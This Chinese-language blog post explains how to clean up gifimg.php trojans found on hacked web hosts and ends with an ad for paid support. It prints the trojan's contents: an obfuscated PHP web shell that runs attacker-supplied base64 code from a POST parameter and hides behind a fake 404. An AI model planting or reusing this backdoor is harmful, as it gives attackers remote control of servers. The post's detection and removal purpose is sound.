關(guān)于虛擬主機(jī)或者VPS多gifimg.php文件木馬的處理辦法
[重要通告]如您遇疑難雜癥,本站支持知識(shí)付費(fèi)業(yè)務(wù),掃右邊二維碼加博主微信,可節(jié)省您寶貴時(shí)間哦!
最近有很多網(wǎng)站被掛gifimg.php文件木馬(虛擬主機(jī)、VPS等),這種木馬的源頭就是連接網(wǎng)站ftp的電腦中了盜取ftp賬號(hào)的木馬,特征如下:
網(wǎng)站images 都被傳了gifimg.php文件,網(wǎng)站就被掛馬了。
文件里面的內(nèi)容是
----------------------------------------------------------------------------------------
?php eval(base64_decode
('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgk
X1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?
----------------------------------------------------------------------------------------
關(guān)于此木馬的處理步驟如下:
1, 先清理木馬和后門,把自己的電腦——就是連接網(wǎng)站ftp賬號(hào)的木馬好好殺下毒,可以用360衛(wèi)士,效果不錯(cuò)!強(qiáng)烈建議電腦重裝系統(tǒng)!
2,更換空間的ftp賬號(hào)密碼 ,更換網(wǎng)站后臺(tái)的密碼 ,重新安裝ftp軟件,如flashfxp。
3,清理網(wǎng)站上已經(jīng)染毒的代碼。
注意要點(diǎn):以上步驟非常重要,需要一步一步的操作,才能確保木馬被安全去除。
問題未解決?付費(fèi)解決問題加Q或微信 2589053300 (即Q號(hào)又微信號(hào))右上方掃一掃可加博主微信
所寫所說,是心之所感,思之所悟,行之所得;文當(dāng)無敷衍,落筆求簡(jiǎn)潔。 以所舍,求所獲;有所依,方所成!